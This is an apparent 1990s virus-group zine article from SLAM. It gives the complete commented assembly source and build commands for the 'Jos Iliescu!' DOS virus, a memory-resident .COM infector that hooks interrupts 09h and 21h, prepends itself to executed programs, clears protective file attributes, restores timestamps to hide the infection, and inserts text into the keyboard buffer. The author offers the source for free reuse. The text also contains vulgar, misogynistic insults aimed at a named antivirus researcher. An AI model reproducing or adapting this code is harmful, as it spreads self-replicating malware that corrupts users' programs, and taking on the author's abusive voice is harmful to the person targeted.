SLAM2.036: Jos Iliescu Virus Disassembling by Virtual Daemon [SLAM]
⁄-------------------------------------------------------------ø
| "Jos Iliescu!" Virus Dissasembled by Virtual Daemon of SLAM |
¿-------------------------------------------------------------Ÿ
Before we begin here's some words from Patricia Hoffman (fat bitch).
Note: the words between "<>" are my comments...
-----------------------------------------------------------------------
Virus Name: Jos <actually it's name is "Jos Iliescu!", but...>
Aliases:
V Status: Rare <"Rare" my ass! This shit has scared millions of fouls :)>
Discovered: November, 1992
Symptoms: .COM file growth; TSR
Origin: Romania
Eff Length: 1,000 Bytes
Type Code: PRsC - Parasitic Resdent .COM Infector
Detection Method: blah, blah, blah .... :) <I really don't care :) >
Removal Instructions: Delete infected files. <God! She's so stupid...>
General coments:
The Jos virus was submitted in November, 1992. It is originally from Romania. Jos is a memory resident infector of .COM programs, but not COMMAND.COM.
When the first Jos infected program is executed, the Jos virus will install itself memory resident as a low system memory TSR of 1,312 bytes. Interrupts 09 and 21 will be hooked by Jos in memory.
Once the Jos virus is memory resident, it will infect .COM programs when they are executed. Infected programs will have a file length increase of 1,000 bytes with the virus being located at the beginning of the file. The program's date and time in the DOS disk directory listing will not be altered. The following text strings are visible within the viral code in all Jos infected programs:
- "JABBERWOCKY, the first Romanian Political Virussian"
- "DhoE1" <Sorry to disapoint you Patricia... but the "ho">
- "Dhohoho" <part is just a simple "cr+lf" encrypted>
- "Release date 12-22-1990"
Jos is not related to the JW2 or Jabberwocky virus.
It it unknown what Jos does besides replicate.
<If you didn't fuck every morning with the paperboy you could have guessed>
<what this little shit does... But I guess you aint smart enough! ;-) >
---------------------------------------------------------------------------
Ok.
Now that you've seen this shit, let me explain what the virus actions are... I'm not gonna tell you how it infect files, or how it's going resident... The source is well comented (I think), so if you can't understand it, then you're a BIG LAMER! And lamers must be killed... ;-)
Like you've seen above, the "Jos Iliescu!" virus will hook (if resident) the interrupts 09 and 21. Interrupt 21 is obviously why it's hooked, because virus needs it to infect files via 4bh (file execute). But what you don't know is what for interrupt 09 is hooked. Well, I'll tell ya'! :)
Everytime a key is pressed the interrupt 09 is activated... The virus reads if the keys "j", "o" and "s" are typed, and if true it will add the word " ILIESCU! ". Btw: Iliescu was a president of Romania from 23 dec. 1989 (the revolution) till 14 nov. 1996. For the people out there who doesn't know what the word "jos" means: "jos" means down. Down with Iliescu president! That's what this virus is all about...:) My opinion is that the virus is made by a comunist or by a person who didn't liked the revolution...
The virus use some "never seen before" (well, very rare not never seen) methods for going resident, so it was cool to dissasemble it! :)
Well, I think that's all... The source is here! You're free to use anything that you like, without giving credit to no one, because I don't know who's the author of the virus. Enjoy!
To build this type:
tasm iliescu.asm
tlink iliescu.obj /t
.
--------------------------------- cut here ----------------------------------
psplength equ 80h
filetime equ 82h ;file time
filedate equ 84h ;file date
filelength equ 146h ;file length
fileattr equ 8Ch ;file attributes
buffer equ 86h ;reading buffer (2 bytes)
segaloc equ 8Eh
filename equ 88h ;file name pointer in ASCIIZ
mcbtype equ 0
size1mcb equ 3 ;address towards the dimension of the first MCB
memtop equ 12h
data_8e equ 156h
owner equ 501h
mcbsize equ 503h ;adress towards the dimension of the second MCB
pspowner equ 546h
corupted_file equ 4F7h
code segment byte public
assume cs:code,ds:code
org 100h
virus_start:
mov bx,11eh
mov word ptr [bx-20h],21cdh ;'int 21h'
mov word ptr [bx-1Eh],14ebh ;'jmp 116h'
xchg bp,ax
mov ax,4bfeh ;dos function load and go
mov byte ptr [bx],17h
jmp short $-16h ;jump at 100h-2
cli ;disable interrupts
xor ax,ax ;ax=0
mul ah ;obtain 0
mov [bx],al ;first exec the jmp to cont
jz puttext ;and then modify the jmp
puttext:
mov si,offset message+28h ;message to display
mov cx,98h ;text length
cld ;clear direction
newchr:
lodsb ;string [si] to al
mov ah,0Eh
xor al,65h ;decode message using xor 65h
int 10h ;write char al,teletype mode
loop newchr
delay:
loop delay ;short delay before cold reset
db 0eah ;JMP 'FAR' code
dw 0 ;FFFF:0000
dw 0FFFFh ;do a cold reset
cont:
mov ax,ds
dec ax
mov ds,ax ;DS=seg of MCB
add ax,50h ;jmp over 500 bytes
mov es,ax ;ES=seg of destination
inc ax ;jmp over 16 bytes
mov ss,ax ;SS=new stack segment
sti ;enable interrupts
std ;set direction flag
fillen:
mov di,4E20h ;original file length
add di,corupted_file ;corrupted file
mov si,di
mov cx,si
inc cx
rep movsb ;copy upper
mov ds:owner,ax ;owner
mov ds:pspowner,ax ;owner in PSP
mov ds:memtop,es ;memtop in PSP
sub word ptr ds:mcbsize,50h ;size in parag.
xchg bx,ax ;bx=new PSP seg calculated above
mov ah,50h ;DOS function=set active PSP seg from BX
int 21h
mov byte ptr ds:mcbtype,'M' ;another block follows
mov word ptr ds:size1mcb,4Fh ;dimension of first block
push ss
push ss
push ss
mov si,ds:data_8e
pop ds
pop es ;DS=SS=ES upper in memory
mov dx,psplength
mov ah,1Ah ;set DTA to ds:80h
int 21h
mov di,100h
add si,di
mov cx,1F4h
cld ;clear direction
push di ;offset for RETF (100h)
mov word ptr cs:[di],1ebbh ;'mov bx,11eh' rebuild code
rep movsw ;activate un-infected program
push cs
pop ds ;DS=CS=seg of vir resident
mov word ptr ds:psplength,0FF00h
inc flag
mov ax,3509h ;get INT 09h interrupt vector
int 21h
mov word ptr ds:[1D1h],bx ;config original call
mov word ptr ds:[1D3h],es
mov dx,offset int9handler
mov ax,2509h ;set new handler for INT 09h
int 21h
mov ax,3521h ;get INT 21h interrupt vector
int 21h
mov word ptr ds:[30Eh],bx ;config original JMP
mov word ptr ds:[310h],es
mov dx,offset int21handler
mov ax,2521h ;set new handler for INT 21h
int 21h
push ss
push ss
pop es
pop ds
xchg bp,ax
retf ;return far
int9handler proc far
pushf ;push flags
db 9Ah ;code of 'call far' original INT 09h
dw 45h,3EBh ;'0F17:0124'
push ax
mov ah,1
int 16h ;keyboard I/O if zf=0 al=char
jnz char ;jump if not zero
leave_int9:
pop ax
iret ;leave interrupt 9
int9handler endp
char:
sti ;enable interrupts
or al,20h ;flip to lower case
mov ah,cs:psplength
xchg al,ah ;ah=read character,al=nr of characters
cmp al,0
jne full
cmp ah,'j' ;test 'j' letter
jne leave_int9
found:
inc byte ptr cs:psplength ;increase char contor
pop ax
iret
full:
cmp al,1
jne again
cmp ah,'o' ;test 'o' letter
je found
dontfit:
mov byte ptr cs:psplength,0
pop ax
iret
again:
cmp al,2
jne again2
cmp ah,'s' ;test 's' letter
je found
jnz dontfit
again2:
push ds ;save registers
push es
push si
push di
push cx
xor ax,ax
mov es,ax
push cs
pop ds
mov di,41ah ;address of keyboard buffer head
mov si,offset written
mov cx,0Bh
nop
cli ;disable interrupts
cld ;clear direction
decod:
lodsb ;string [si] to al
xor al,0A5h ;decrypt with xor 0a5h
stosw ;fill keyboard buffer with 'jos'
loop decod
sti ;enable interrupts
pop cx ;restore registers
pop di
pop si
pop es
pop ds
jmp short dontfit
db 'JABBERWOCKY (',2,')'
message db ', the first Romanian Political Virussian'
db 27h,0,12h,0,17h,0,45h ;'Beware'
db 11h,0Dh,0,45h ;'the'
db 2Fh,4,7,7,0,17h,12h,0Ah,6,0Eh,49h,45h ;'Jabberwock, '
db 8,1Ch,45h ;'my '
db 16h,0Ah,0Bh,44h ;'son!'
db 68h,6Fh ;+
db 45h,31h,0Dh,0,45h ;' The '
db 0Fh,4,12h,16h,45h ;'jaws '
db 11h,0Dh,4,11h,45h ;'that '
db 7,0Ch,11h,0,49h,45h ;'bite, '
db 11h,0Dh,0,45h ;'the '
db 6,9,4,12h,16h,45h ;'claws '
db 11h,0Dh,4,11h,45h ;'that '
db 6,4,11h,6,0Dh,44h ;'catch!'
db 68h,6fh ;+
db 68h,6fh ;+
db 68h,6fh ;+
db 24h,0Bh,1,45h ;'And '
db 0Dh,4,16h,11h,45h ;'hast '
db 11h,0Dh,0Ah,10h,45h ;'thou '
db 16h,9,4,0Ch,0Bh,45h ;'slain '
db 11h,0Dh,0,45h ;'the '
db 2Fh,4,7,7,0,17h,12h,0Ah,6,0Eh,5Ah ;'Jabberwock?'
db 68h,6fh ;+
db 45h,26h,0Ah,8,0,45h ;' Come '
db 11h,0Ah,45h ;'to '
db 8,1Ch,45h ;'my '
db 4,17h,8,16h,49h,45h ;'arms, '
db 8,1Ch,45h ;'my '
db 7,0,4,8,0Ch,16h,0Dh,45h ;'beamish '
db 7,0Ah,1Ch,44h ;'boy!'
db 68h,6fh ;+
int21handler proc far
cmp ah,4Bh ;test DOS Fn 4bh (execute)
je loadgo
loadovl:
db 0eah
dw 0C11h,1531h
loadgo:
cmp al,3 ;test load OVL program
je loadovl
cmp al,0
je exec
cmp al,0FFh
jne continue
mov di,55AAh ;return signature in DI=5aah
iret
int21handler endp
continue:
cmp al,0FEh ;function of residency test in memory
jne loadovl
mov ah,51h ;DOS function=get active PSP seg in bx
int 21h
push ds
push es
mov ds,bx
mov es,bx ;ES=DS=seg of active PSP
cld ;clear direction
sti ;enable interrupts
mov si,ds:filelength ;si=file length
mov di,100h ;from 100h
add si,di
mov cx,1F4h ;how many bytes to copy
rep movsw
pop es
pop ds
xchg bp,ax
iret ;leave INT 21h
com_check:
cmp word ptr [di-4],'FA' ;test '...AF?.COM'
je term
cmp word ptr [di-4],'SS' ;test '...SS?.COM'
jne loc_20
cmp byte ptr [di-2],'T' ;test '...SST.COM'
jne loc_20
jz serr
not_com:
mov byte ptr cs:dosmsg,0Bh ;COM=invalid format
cmp word ptr [di-3],'VC' ;test '...CV.???'
je serr
cmp word ptr [di-3],'DT' ;test '...TD.???'
je serr ;for debuggers
jnz loc_20
exec:
push ds ;save registers
push es
push si
push di
push bp
push dx
push cx
push bx
mov di,dx
mov cx,5Ah ;scan max 90 bytes
mov al,0 ;search marker 0
push ds
pop es ;ES:DI=address of file_name ASCIIZ
cld ;clear direction
repne scasb
sub di,4 ;poz on file extension
mov byte ptr cs:dosmsg,8 ;message: 'insuf. memory'
cmp word ptr [di],'OC' ;check if COM
jne not_com
cmp word ptr [di-4],'SF' ;test '...FS?.COM'
jne com_check
term:
cmp byte ptr [di-2],'D' ;test FSD.COM or AFD.COM
jne loc_20
serr:
pop bx ;restore registers
pop cx
pop dx
pop bp
pop di
pop si
pop es
pop ds
pop bx
pop ax
popf ;pop flags
push ax
push bx
stc ;set carry flag
mov ax,cs:dosmsg
retf ;return far
loc_20:
mov si,di
sub si,8
mov cx,3
repe cmpsb ;rep zf=1+cx >0 Cmp [si] to es:[di]
jz ldovl
mov word ptr cs:filename+2,ds
mov cs:filename,dx
mov ax,3D00h ;DOS function=open file for read
int 21h
jc ldovl
mov bx,ax ;save file handle in BX
mov ax,5700h ;DOS function=get file time/date
int 21h
push cs
pop ds
mov ds:filetime,cx ;save file time
mov ds:filedate,dx ;save file date
mov ah,3fh ;DOS function=read from file
mov dx,buffer ;save in buffer
mov cx,2 ;read 2 bytes
int 21h
jc closefile ;if error then close file
cmp ax,cx ;have we read 2 bytes?
jne closefile ;nope! close the fucking file!
cmp word ptr ds:buffer,'ZM' ;check if is EXE
je closefile ;EXE found! close it quick!
cmp word ptr ds:buffer,1EBBh ;code of 'mov bx,11eh'
je closefile ;found? then close the file
mov ax,4202h ;DOS function=set file pointer
xor cx,cx ;move to end of file
xor dx,dx
int 21h
test dx,dx
jnz closefile ;error ocured! close file!
cmp ax,0BB8h ;is file to small? (0BB8h=3000)
jbe closefile ;I'm afraid so... close it!
cmp ax,0F618h ;is the file to big? (0F618=63000)
jbe infect ;nope! we can infect it...:)
closefile:
mov ah,3Eh ;DOS function=close file
int 21h
ldovl:
pop bx ;restore registers
pop cx
pop dx
pop bp
pop di
pop si
pop es
pop ds
mov ax,4B00h
jmp loadovl
infect:
mov ds:filelength,ax ;file length
mov ah,3Eh ;DOS funcion=close file
int 21h
lds dx,dword ptr ds:filename ;DS:DX=file name
mov ax,4300h ;DOS function=get file attributes
int 21h
mov cs:fileattr,cx ;save file attributes
test cl,7 ;test for 'sys/hid/read-only'
jz neprot ;if not one of those then move on
mov ax,4301h ;DOS function=set new file attr
xor cx,cx ;cx=0 => normal file
int 21h
jc closefile ;if error then close file
neprot:
mov ax,3d02h ;DOS function=open file for r/w
int 21h
jc closefile ;if error then close file
xchg bp,ax ;save file handle in bp
mov bx,3Fh ;number of bytes to alloc
mov ah,48h ;DOS function=allocate memory
int 21h
jc closefile ;if error then exit
mov bx,bp
mov ds,ax ;DS=seg address of allocated mem
mov cs:segaloc,ax
xor dx,dx
mov si,3E8h
mov cx,si ;cx=virus length (3e8h=1000)
mov ah,3Fh ;DOS function=read from file
int 21h
jc ioerror ;if error then jmp to ioerror
xor cx,cx ;seek to end of file
xor dx,dx
mov ax,4202h ;DOS function=set file pointer
int 21h
mov ah,40h ;DOS function=write to file
mov cx,si ;si=cx=3e8h=1000=vir_length=...:)
int 21h
jc ioerror ;if error then jmp to ioerror
mov ax,4200h ;DOS function=set file pointer
xor cx,cx ;seek to beginning of file
xor dx,dx
int 21h
push cs
pop ds
mov cx,si ;cx=virus length
mov dx,100h ;write from beginning (100h)
mov ah,40h ;DOS function=write to file
int 21h
ioerror:
mov es,ds:segaloc ;es=segment
mov ah,49h ;DOS function=free memory block
int 21h
mov ax,5701h ;DOS function=set file time/date
mov cx,ds:filetime ;restore saved file time
mov dx,ds:filedate ;restore saved file date
int 21h
mov ah,3Eh ;DOS function=close file
int 21h
mov cx,ds:fileattr ;cx=old file attributes
mov ax,4301h ;DOS function=set file attributes
lds dx,dword ptr cs:filename ;DS:DX=name of file
int 21h
jmp ldovl
written db 0BBh ;adress of "Head"
db 95h ;adress of "Tail"
db 85h,0ECh,0E9h,0ECh,0E0h,0F6h,0E6h,0F0h,85h ;' ILIESCU '
flag dw 0Dh
dosmsg dw 8
db 'Release date 12-22-1990'
db 19000 dup (0B0h) ;original prog.code
db 0B4h, 4Ch,0CDh, 21h
db 996 dup (0B0h)
code ends
end virus_start
--------------------------------- cut here ----------------------------------
Virtual Daemon
Viral Development Researcher & Virii Colector
Member of SLAM Virus Team
Network Administrator
E-mail: virtual_daemon@hotmail.com
Web: http://www.geocities.com/SiliconValley/Heights/3334
